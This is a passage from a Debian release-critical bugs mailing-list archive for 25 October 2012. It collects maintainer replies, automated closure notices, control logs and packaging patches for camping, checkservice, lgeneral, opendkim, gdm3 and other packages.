Bug#691440: apache2-suexec: copyright file missing after upgrade (policy 12.5)

2012-10-25 Thread Andreas Beckmann
Uups, wrong template used ...

That happens during the sid - experimental upgrade, not squeeze-wheezy.

Andreas


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691223: atanks: source tarball includes Win32 binaries without source

2012-10-25 Thread Michael Gilbert
Hi,

I've uploaded an nmu fixing this issue to delayed/2.  See attached
patch, which is kind of unclear since the primary change was removing
the binary files from the upstream tarball and that doesn't show well
in the diff.

Best wishes,
Mike


atanks.patch
Description: Binary data


Bug#691440: apache2-suexec: copyright file missing after upgrade (policy 12.5)

2012-10-25 Thread Arno Töll
Hi,

not that apache2-suexec is an empty meta-package transitioning to
apache2-suexec-pristine. I decided not to include the copyright file on
purpose for it and users are supposed to purge the package after an upgrade.

But oh well, if it makes you happy ...


-- 
with kind regards,
Arno Töll
IRC: daemonkeeper on Freenode/OFTC
GnuPG Key-ID: 0x9D80F36D



signature.asc
Description: OpenPGP digital signature


Bug#691311: Upgrading liboctave1 confirmed to fix

2012-10-25 Thread sacrificial-spam-address
 I confirm this. The solution is to upgrade your liboctave1 package to
 version 3.6.3-2.

Thanks for the tip; I would have upgraded that at the same time, but
managed to overlook it since it's a long way away in an alphabetical
list.

That does indeed fix it.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#689038: marked as done (camping: Does not support HTTP POST)

2012-10-25 Thread Debian Bug Tracking System
Your message dated Thu, 25 Oct 2012 18:02:27 +
with message-id e1trrld-00050e...@franck.debian.org
and subject line Bug#689038: fixed in camping 2.1.498-4
has caused the Debian Bug report #689038,
regarding camping: Does not support HTTP POST
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
689038: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=689038
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: camping
Version: 2.1.498-3
Severity: grave
Tags: patch upstream
Justification: renders package unusable

Hi,

Currently, it is not possible in Debian to use the Camping framework to
write/create an application that supports HTTP POST next to GET nor to
use/run Camping webapps that use POST.
This only holds when using Camping server and not other deployment methods. 
However, it is obviously a must for it to work during development.

The problem is caused by the fact that the Rack::File middleware, used for
serving static files, is chained before the app and this middleware
logically doesn't support POST and throws a HTTP 405 error which is
subsequently not handled.

The patch attached ensures that HTTP 405 is ignored and the POST request is
propagated to the Camping app.

Cheers,
Paul

-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (102, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-3-amd64 (SMP w/4 CPU cores)
Locale: LANG=nl_NL.UTF-8, LC_CTYPE=nl_NL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages camping depends on:
ii  ruby  4.9
ii  ruby-rack 1.4.1-2
ii  ruby1.8 [ruby-interpreter]1.8.7.358-4
ii  ruby1.9.1 [ruby-interpreter]  1.9.3.194-1

Versions of packages camping recommends:
ii  ruby-activerecord-2.3  2.3.14-2
ii  ruby-mab   0.0.1+git20120515.30414e4-2
ii  ruby-sqlite3   1.3.6-2
ii  ruby-tilt  1.3.3-2

Versions of packages camping suggests:
ii  thin  1.3.1-3

-- no debconf information
From fe791e787f5665efdc3f17b0f6122260b3a6d770 Mon Sep 17 00:00:00 2001
From: Magnus Holm judo...@gmail.com
Date: Fri, 10 Feb 2012 17:31:12 +0100
Subject: [PATCH] Server: Also catch 405 from Rack::File

---
 lib/camping/server.rb |2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/camping/server.rb b/lib/camping/server.rb
index 47bffa7..af2bfc8 100644
--- a/lib/camping/server.rb
+++ b/lib/camping/server.rb
@@ -149,7 +149,7 @@ module Camping
 end
 
 def app
-  Rack::Cascade.new([Rack::File.new(public_dir), self], [404, 403])
+  Rack::Cascade.new([Rack::File.new(public_dir), self], [405, 404, 403])
 end
 
 def current_app
-- 
1.7.10.4

---End Message---
---BeginMessage---
Source: camping
Source-Version: 2.1.498-4

We believe that the bug you reported is fixed in the latest version of
camping, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 689...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Paul van Tilburg pau...@debian.org (supplier of updated camping package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Thu, 25 Oct 2012 19:54:15 +0200
Source: camping
Binary: camping
Architecture: source all
Version: 2.1.498-4
Distribution: unstable
Urgency: low
Maintainer: Debian Ruby Extras Maintainers 
pkg-ruby-extras-maintain...@lists.alioth.debian.org
Changed-By: Paul van Tilburg pau...@debian.org
Description: 
 camping- small Ruby web framework for Model-View-Controller type applicati
Closes: 689038
Changes: 
 camping (2.1.498-4) unstable; urgency=low
 .
   * debian/patches: add camping-allow-POST-through-Rack-File,
 courtesy of Magnus Holm (closes: #689038)
   * debian/source/local-options: unapply patches after build
Checksums-Sha1: 
 23e7d2406939e7d5e375e6f2cca7bfd357eb4c10 1402 camping_2.1.498-4.dsc
 78312400575313655bb66348733890d4f8ef9089 6249 camping_2.1.498-4.debian.tar.gz
 d8f921ec019dc76a37f89730bbcb7b62062341df 110096 camping_2.1.498-4_all.deb
Checksums-Sha256: 
 93691e8301f59a4f6f75477a408bd5e5119929a0853874788bc96d3b92acc380 1402 

Bug#690594: tasksel: execution aborted due to compilation errors

2012-10-25 Thread Michael Gilbert
control: tag -1 patch

Hi,

I've uploaded an nmu fixing this issue to delayed/7.  The extra time
is in case you want to do a maintainer upload instead.  See attached
patch.

Best wishes,
Mike


tasksel.patch
Description: Binary data


Processed: re: tasksel: execution aborted due to compilation errors

2012-10-25 Thread Debian Bug Tracking System
Processing control commands:

 tag -1 patch
Bug #690594 [tasksel] tasksel: execution aborted due to compilation errors
Added tag(s) patch.

-- 
690594: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=690594
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: found 660455 in 1.0.1-3.1, found 527900 in 4.1.0-1~dfsg-3, found 668751 in 1.0.1+repack1-1.1 ...

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 found 660455 1.0.1-3.1
Bug #660455 [prelude-manager] prelude-manager: fails to purge - command in 
postrm not found
Marked as found in versions prelude-manager/1.0.1-3.1.
 found 527900 4.1.0-1~dfsg-3
Bug #527900 [yate] unowned files after purge (policy 6.8)
Marked as found in versions yate/4.1.0-1~dfsg-3.
 found 668751 1.0.1+repack1-1.1
Bug #668751 [liquidsoap] liquidsoap: unowned directory after purge: 
/usr/share/liquidsoap
Marked as found in versions liquidsoap/1.0.1+repack1-1.1.
 found 689332 1:9.7.3.dfsg-1~squeeze8
Bug #689332 [bind9] bind9: postinst uses shipped file 
/usr/share/bind9/bind9-default.md5sum as statefile
Marked as found in versions bind9/1:9.7.3.dfsg-1~squeeze8.
 found 691439 1.1.5-4
Bug #691439 [libfreeipmi12] libfreeipmi12: copyright file missing after upgrade 
(policy 12.5)
Ignoring request to alter found versions of bug #691439 to the same values 
previously set
 found 669278 kdebase-workspace-bin/4:4.8.4-4
Bug #669278 [libqt4-dbus] please add phonon-backend-xine transitional package
Bug #655382 [libqt4-dbus] libqt4-dbus has circular Depends on qdbus
Bug #669878 [libqt4-dbus] Could not perform immediate configuration on 
'phonon-backend-vlc'
The source kdebase-workspace-bin and version 4:4.8.4-4 do not appear to match 
any binary packages
Marked as found in versions kdebase-workspace-bin/4:4.8.4-4.
Marked as found in versions kdebase-workspace-bin/4:4.8.4-4.
Marked as found in versions kdebase-workspace-bin/4:4.8.4-4.
 affects 690067 + syslog-ng
Bug #690067 [syslog-ng-core] symlink conffiles are not supported, causing 
problems for dpkg on upgrade/removal and incorrect debsums reports
Added indication that 690067 affects syslog-ng
 affects 688712 + wesnoth-all
Bug #688712 [wesnoth] wesnoth: needs to handle symlink to directory change of 
/usr/share/doc/wesnoth
Added indication that 688712 affects wesnoth-all
 affects 689005 + jlatex209-bin
Bug #689005 [texlive-binaries] texlive-binaries: please add Breaks: jtex-bin, 
multex-bin to fix upgrades from wheezy
Added indication that 689005 affects jlatex209-bin
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
527900: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=527900
655382: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=655382
660455: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=660455
668751: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=668751
669278: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=669278
669878: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=669878
688712: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688712
689005: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=689005
689332: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=689332
690067: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=690067
691439: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691439
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: reassign 691439 to libipmidetect0,libfreeipmi12, found 691439 in 1.1.5-4

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 reassign 691439 libipmidetect0,libfreeipmi12
Bug #691439 [libfreeipmi12] libfreeipmi12: copyright file missing after upgrade 
(policy 12.5)
Bug reassigned from package 'libfreeipmi12' to 'libipmidetect0,libfreeipmi12'.
No longer marked as found in versions freeipmi/1.1.5-4.
Ignoring request to alter fixed versions of bug #691439 to the same values 
previously set
 found 691439 1.1.5-4
Bug #691439 [libipmidetect0,libfreeipmi12] libfreeipmi12: copyright file 
missing after upgrade (policy 12.5)
Marked as found in versions freeipmi/1.1.5-4.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
691439: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691439
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#689883: marked as done (Ships a folder in /var/run or /var/lock (Policy Manual section 9.3.2))

2012-10-25 Thread Debian Bug Tracking System
Your message dated Thu, 25 Oct 2012 18:17:27 +
with message-id e1trrzj-000864...@franck.debian.org
and subject line Bug#689883: fixed in checkservice 1.1.0-12
has caused the Debian Bug report #689883,
regarding Ships a folder in /var/run or /var/lock (Policy Manual section 9.3.2)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
689883: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=689883
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: checkservice
Version: 1.1.0-11
Severity: serious
Tags: patch

Dear Maintainer,

Andreas Beckmann deb...@abeckmann.de reported in -devel that your package
(as well as 27 others) ships a folder either in /var/run or /var/lock. This
is forbidden by policy.

Lintian detects the problem and warns as follow:

/var/run may be a temporary filesystem, so any directories or files needed
/there must be created dynamically at boot time.

Refer to Debian Policy Manual section 9.3.2 (Writing the scripts) for
details.

Severity: serious, Certainty: possible
Check: files, Type: binary, udeb

which is why I am reporting this bug with severity serious (and there fore,
release critical).

Please fix your package. I have attached what I believe is a good fix the
problem, however, I haven't tried it, and I haven't tested if something more
for creating the necessary folder at runtime should be added. Please make
sure to test before applying the patch blindly.

Cheers,

Thomas Goirand (zigo)
diff -u checkservice-1.1.0/debian/changelog checkservice-1.1.0/debian/changelog
--- checkservice-1.1.0/debian/changelog
+++ checkservice-1.1.0/debian/changelog
@@ -1,3 +1,10 @@
+checkservice (1.1.0-11.1) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * Fixes wrong handling of var/lock/checkservice life cycle (Closes: #XX).
+
+ -- Thomas Goirand z...@debian.org  Sun, 07 Oct 2012 10:31:51 +
+
 checkservice (1.1.0-11) unstable; urgency=low
 
   * Set pluginpath to /usr/share/checkservice too ;)
diff -u checkservice-1.1.0/debian/dirs checkservice-1.1.0/debian/dirs
--- checkservice-1.1.0/debian/dirs
+++ checkservice-1.1.0/debian/dirs
@@ -8,3 +8,2 @@
 var/cache/checkservice
-var/lock/checkservice
 var/log/checkservice
diff -u checkservice-1.1.0/debian/checkservice.cron.d checkservice-1.1.0/debian/checkservice.cron.d
--- checkservice-1.1.0/debian/checkservice.cron.d
+++ checkservice-1.1.0/debian/checkservice.cron.d
@@ -6 +6 @@
-*/10 *	* * *	root	[ -x /usr/sbin/checkservice -a -f /etc/checkservice/checkservice.conf ]  /usr/sbin/checkservice -l /var/log/checkservice  /dev/null
+*/10 *	* * *	root	[ -x /usr/sbin/checkservice -a -f /etc/checkservice/checkservice.conf ]  mkdir -p /var/lock/checkservice  /usr/sbin/checkservice -l /var/log/checkservice  /dev/null
--- checkservice-1.1.0.orig/debian/postrm
+++ checkservice-1.1.0/debian/postrm
@@ -0,0 +1,9 @@
+#!/bin/sh
+
+set -e
+
+if [ ${1} = purge ] ; then
+	rm -rf /var/lock/checkservice
+fi
+
+#DEBHELPER#
---End Message---
---BeginMessage---
Source: checkservice
Source-Version: 1.1.0-12

We believe that the bug you reported is fixed in the latest version of
checkservice, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 689...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Paul van Tilburg pau...@debian.org (supplier of updated checkservice package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Thu, 25 Oct 2012 20:00:10 +0200
Source: checkservice
Binary: checkservice
Architecture: source all
Version: 1.1.0-12
Distribution: unstable
Urgency: low
Maintainer: Paul van Tilburg pau...@debian.org
Changed-By: Paul van Tilburg pau...@debian.org
Description: 
 checkservice - Checks the status of services on (remote) hosts
Closes: 689883
Changes: 
 checkservice (1.1.0-12) unstable; urgency=low
 .
   * Fixes wrong handling of var/lock/checkservice life cycle,
 fix courtesy of Thomas Goirand z...@debian.org (Closes: #689883)
   * debian/dirs: no longer create /var/lock/checkservice
   * debian/checkservice.cron.d: create lock dir before run (if needed)
   * debian/postrm: remove lock dir, if exists
Checksums-Sha1: 
 1c407302487775917e33665a1218c05b5b2f39be 1038 

Bug#690373: Ping: gdcm: incomplete copyright file (#690373)

2012-10-25 Thread Andreas Tille
Hi,

On Thu, Oct 25, 2012 at 04:03:38PM +0200, Mathieu Malaterre wrote:
 On Thu, Oct 25, 2012 at 2:45 PM, Andreas Tille ti...@debian.org wrote:
  I pinged you two days ago but did not got any answer.  If I do not hear
  from you I'll take action at this weekend, latest next Monday.
 
 Feel free to do whatever you want with this. I am not taking action
 until 2.2.2 comes out, of debian goes out of freeze (whichever comes
 first)

I just verified that the bug does not affect testing (which I thought
previousely - thus the ping).  So I agree that waiting for a new version
seems to be appropriate for this bug.

Kind regards and sorry for the noise

   Andreas.

-- 
http://fam-tille.de


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#680084: os-prober: postinst script gets stuck

2012-10-25 Thread Michael Gilbert
 Maybe some information about the disk layout helps, too:

 /dev/sda is the only disk installed.

   /dev/sda1   /boot ext4
   /dev/sda2   encrypted physical volume for lvm2:

   /dev/mapper/pv00physical volume
   /dev/mapper/vg00-root   / filesystem ext4
   /dev/mapper/vg00-swap   swap
   /dev/mapper/vg00-root2  empty ext4
   /dev/mapper/vg00-export empty ext4

Is this the contents of your /etc/fstab?  If so, using empty as the
mount point could be part of the problem.  If this is the case, could
you try changing empty to a real mount point?

Thanks,
Mike


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691394: opendkim: DomainKeys Identified Mail (DKIM) Verifiers may inappropriately convey message trust

2012-10-25 Thread Florian Weimer
* Scott Kitterman:

 This is not something that can be dealt with operationally.  Unlike
 GPG, where keys are trusted based on signatures and web of trust
 (and people can decline to sign bad keys), in DKIM keys are trusted
 based on their being published in the sending domain's DNS and there
 is no human in the loop.

I still don't see how this is different from the OpenPGP situation.

Assuming that DNS is secure enough, If the sender doesn't publish a
short key, it's not possible to use one.  There is also no certificate
chaining which could result in an unknown set of potentially
problematic certificates.  It really boils down to using DKIM
correctly.

Rejecting short keys still has value because without such drastic
measures, insecure cryptography works as well as secure cryptography,
but I don't think this warrants a security update.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691223: atanks: source tarball includes Win32 binaries without source

2012-10-25 Thread Fabian Greffrath
 I've uploaded an nmu fixing this issue to delayed/2.  See attached
 patch, which is kind of unclear since the primary change was removing
 the binary files from the upstream tarball and that doesn't show well
 in the diff.

Please do also apply the patch attached to #691107, or else atanks will
end up with an unusable Options menu if rebuilt with g++-4.7 (which it
will). It's only Priority: important, but should IMHO nevertheless get
fixed for wheezy.

 - Fabian


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691451: lgeneral: ships non-free files in contrib

2012-10-25 Thread Markus Koschany
Package: lgeneral
Version: 1.1.1-5
Severity: serious
Justification: Policy 2.2.2

LGeneral ships non-free files in contrib. These are

src/themes/default/bkgnd.bmp
src/themes/default/brief_frame.bmp

These files are identical to those which were included
in the commercial game Panzer General. I intend to adopt LGeneral on behalf of 
the Debian
Games Team. My new package is available at mentors.debian.net.

http://mentors.debian.net/package/lgeneral

and also in Git at

http://git.debian.org/pkg-games/lgeneral.git

I have replaced all problematic files and i am looking for
someone who can upload them. 

Note: this bug affects all distributions including stable.

I will file another bug report for lgc-pg in stable which is also
affected. 


-- System Information:
Debian Release: 6.0.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages lgeneral depends on:
ii  libc6 2.11.3-4   Embedded GNU C Library: Shared lib
ii  libsdl-mixer1.2   1.2.8-6.3  mixer library for Simple DirectMed
ii  libsdl1.2debian   1.2.14-6.1 Simple DirectMedia Layer

lgeneral recommends no packages.

Versions of packages lgeneral suggests:
ii  lgc-pg0.32-3 LGeneral Converter for Panzer Gene

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691394: opendkim: DomainKeys Identified Mail (DKIM) Verifiers may inappropriately convey message trust

2012-10-25 Thread Scott Kitterman
On Thursday, October 25, 2012 08:59:54 PM Florian Weimer wrote:
 * Scott Kitterman:
  This is not something that can be dealt with operationally.  Unlike
  GPG, where keys are trusted based on signatures and web of trust
  (and people can decline to sign bad keys), in DKIM keys are trusted
  based on their being published in the sending domain's DNS and there
  is no human in the loop.
 
 I still don't see how this is different from the OpenPGP situation.
 
 Assuming that DNS is secure enough, If the sender doesn't publish a
 short key, it's not possible to use one.  There is also no certificate
 chaining which could result in an unknown set of potentially
 problematic certificates.  It really boils down to using DKIM
 correctly.
 
 Rejecting short keys still has value because without such drastic
 measures, insecure cryptography works as well as secure cryptography,
 but I don't think this warrants a security update.

I think that RC, but not warranting a security update is a reasonable state 
for this issue.  I'll take it up with the release team about how to deal with 
Wheezy.

Scott K

signature.asc
Description: This is a digitally signed message part.


Bug#691452: lgc-pg: ships non-free files in contrib

2012-10-25 Thread Markus Koschany
Package: lgc-pg
Version: 0.32-3
Severity: serious
Justification: Policy 2.2.2

The converter for LGeneral, lgc-pg, ships files which are non-free
and belong to the commercial game Panzer General. 

These are all files in

/usr/share/games/lgc-pg/data/

except attack.bmp, move.bmp, grid.bmp, fog.bmp, damage_bars.bmp,
select_frame.bmp.

mapnames must be completely removed. 

I intend to adopt LGeneral on behalf of the Debian Games Team. I have
prepared a new package and also replaced all problematic files.

You can find the new version at mentors.debian.net

http://mentors.debian.net/package/lgeneral

or in Git at

http://git.debian.org/pkg-games/lgeneral.git

I am looking for someone who can upload the replacement files to
stable. 


-- System Information:
Debian Release: 6.0.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages lgc-pg depends on:
ii  libc6 2.11.3-4   Embedded GNU C Library: Shared lib
ii  libsdl1.2debian   1.2.14-6.1 Simple DirectMedia Layer

lgc-pg recommends no packages.

lgc-pg suggests no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#627152: alsa-source: FTBFS

2012-10-25 Thread Jakub Wilk

* Elimar Riesebieter riese...@lxtec.de, 2012-10-25, 19:30:
The old source package (alsa-driver) and the RC-buggy binary package 
(alsa-source) are still in unstable and wheezy:

| $ rmadison -S -s sid,wheezy alsa-driver
|  alsa-base| 1.0.23+dfsg-4 | sid   | all
|  alsa-base-udeb   | 1.0.23+dfsg-4 | sid/main/debian-installer | all
|  alsa-driver  | 1.0.23+dfsg-4 | wheezy| source
|  alsa-driver  | 1.0.23+dfsg-4 | sid   | source
|  alsa-source  | 1.0.23+dfsg-4 | wheezy| all
|  alsa-source  | 1.0.23+dfsg-4 | sid   | all
|  linux-sound-base | 1.0.23+dfsg-4 | wheezy| all
|  linux-sound-base | 1.0.23+dfsg-4 | sid   | all
Should they be removed?

Yes, please.


Okay, thanks for confirming. I'll file removal request in a moment.

--
Jakub Wilk


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#627152: alsa-source: FTBFS

2012-10-25 Thread Jakub Wilk

* Jakub Wilk jw...@debian.org, 2012-10-25, 22:09:
The old source package (alsa-driver) and the RC-buggy binary 
package (alsa-source) are still in unstable and wheezy:

| $ rmadison -S -s sid,wheezy alsa-driver
|  alsa-base| 1.0.23+dfsg-4 | sid   | all
|  alsa-base-udeb   | 1.0.23+dfsg-4 | sid/main/debian-installer | all
|  alsa-driver  | 1.0.23+dfsg-4 | wheezy| source
|  alsa-driver  | 1.0.23+dfsg-4 | sid   | source
|  alsa-source  | 1.0.23+dfsg-4 | wheezy| all
|  alsa-source  | 1.0.23+dfsg-4 | sid   | all
|  linux-sound-base | 1.0.23+dfsg-4 | wheezy| all
|  linux-sound-base | 1.0.23+dfsg-4 | sid   | all
Should they be removed?

Yes, please.


Okay, thanks for confirming. I'll file removal request in a moment.


Or maybe not. linux-sound-base has still a reverse dependency: 
oss4-base.


--
Jakub Wilk


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#627152: alsa-source: FTBFS

2012-10-25 Thread Adam D. Barratt
On Thu, 2012-10-25 at 22:24 +0200, Jakub Wilk wrote:
 * Jakub Wilk jw...@debian.org, 2012-10-25, 22:09:
 The old source package (alsa-driver) and the RC-buggy binary 
 package (alsa-source) are still in unstable and wheezy:
[...]
 Should they be removed?
 Yes, please.
 
 Okay, thanks for confirming. I'll file removal request in a moment.
 
 Or maybe not. linux-sound-base has still a reverse dependency: 
 oss4-base.

That's #690574, fwiw.

Regards,

Adam


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#657751: gdm3: 657751: patch to fix purging when gdm3 is running

2012-10-25 Thread Simon McVittie
clone 657751 -1
retitle -1 '/etc/init.d/gdm3 stop' does not terminate Debian-gdm's dbus-daemons 
etc.
severity -1 normal
thanks

On Sun, 02 Sep 2012 at 21:41:21 +0200, Salvatore Bonaccorso wrote:
 I tried to reproduce this via an installation in a VM, login in a user
 and then purging gdm3. The removal went without the problems
 described.

Perhaps you didn't have a complete GNOME system, only gdm3 itself? I can
reproduce this in two ways:

* install the GNOME desktop task in a VM
* switch to tty1 and purge gdm3, gnome-core, gnome and task-gnome-desktop

and

* install the GNOME desktop task in a VM
* log in to X as a user (on tty7)
* user menu - Switch User (moves you to tty8 with a GDM greeter)
* switch to tty1 and purge gdm3, gnome-core, gnome and task-gnome-desktop

Not all of the greeter processes die when /etc/init.d/gdm3 stop is run:

default|archetype% ssh wheezy-desktop ps -U Debian-gdm -u Debian-gdm u~
USER   PID %CPU %MEMVSZ   RSS TTY  STAT START   TIME COMMAND
108   2842  0.0  0.1  30188  1192 ?Ss   21:25   0:00 
/usr/bin/dbus-daemon --fork --print-pid 5 --print-address 7 --session
108   2864  0.0  0.2  53628  2328 ?S21:25   0:00 
/usr/lib/gvfs/gvfsd
108   2870  0.0  0.3 152956  3296 ?Sl   21:25   0:00 
/usr/lib/at-spi2-core/at-spi-bus-launcher
108   2874  0.0  0.1  29920  1508 ?S21:25   0:00 
/usr/bin/dbus-daemon --config-file=/etc/at-spi2/accessibility.conf --nofork 
--print-address 3

 [But anyway, Paul already did an analysis which in any case (even not
 triggered here) should further 'stabilize' the possible purge process
 for gdm3.]

This does seem to fix it; I've uploaded it.

S


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Bug#657751: gdm3: 657751: patch to fix purging when gdm3 is running

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 clone 657751 -1
Bug #657751 [gdm3] gdm3: error on package purge
Bug 657751 cloned as bug 691458
 retitle -1 '/etc/init.d/gdm3 stop' does not terminate Debian-gdm's 
 dbus-daemons etc.
Bug #691458 [gdm3] gdm3: error on package purge
Changed Bug title to ''/etc/init.d/gdm3 stop' does not terminate Debian-gdm's 
dbus-daemons etc.' from 'gdm3: error on package purge'
 severity -1 normal
Bug #691458 [gdm3] '/etc/init.d/gdm3 stop' does not terminate Debian-gdm's 
dbus-daemons etc.
Severity set to 'normal' from 'serious'
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
657751: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=657751
691458: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691458
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#657751: marked as done (gdm3: error on package purge)

2012-10-25 Thread Debian Bug Tracking System
Your message dated Thu, 25 Oct 2012 21:02:30 +
with message-id e1truzs-0003ve...@franck.debian.org
and subject line Bug#657751: fixed in gdm3 3.4.1-4
has caused the Debian Bug report #657751,
regarding gdm3: error on package purge
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
657751: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=657751
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: gdm3
Version: 3.0.4-4
Severity: serious

Removing gdm3 ...
Purging configuration files for gdm3 ...
insserv: warning: script 'K02evms' missing LSB tags and overrides
insserv: warning: script 'S20LOCAL-fw' missing LSB tags and overrides
insserv: warning: script 'evms' missing LSB tags and overrides
insserv: warning: script 'LOCAL-fw' missing LSB tags and overrides
Removing user `Debian-gdm' ...
Warning: group `Debian-gdm' has no more members.
userdel: user Debian-gdm is currently logged in
/usr/sbin/deluser: `/usr/sbin/userdel Debian-gdm' returned error code 8. 
Exiting.
Could not remove Debian-gdm user.
/usr/sbin/delgroup: `Debian-gdm' still has `Debian-gdm' as their primary group!
Could not remove Debian-gdm group.
insserv: warning: script 'K02evms' missing LSB tags and overrides
insserv: warning: script 'S20LOCAL-fw' missing LSB tags and overrides
insserv: warning: script 'evms' missing LSB tags and overrides
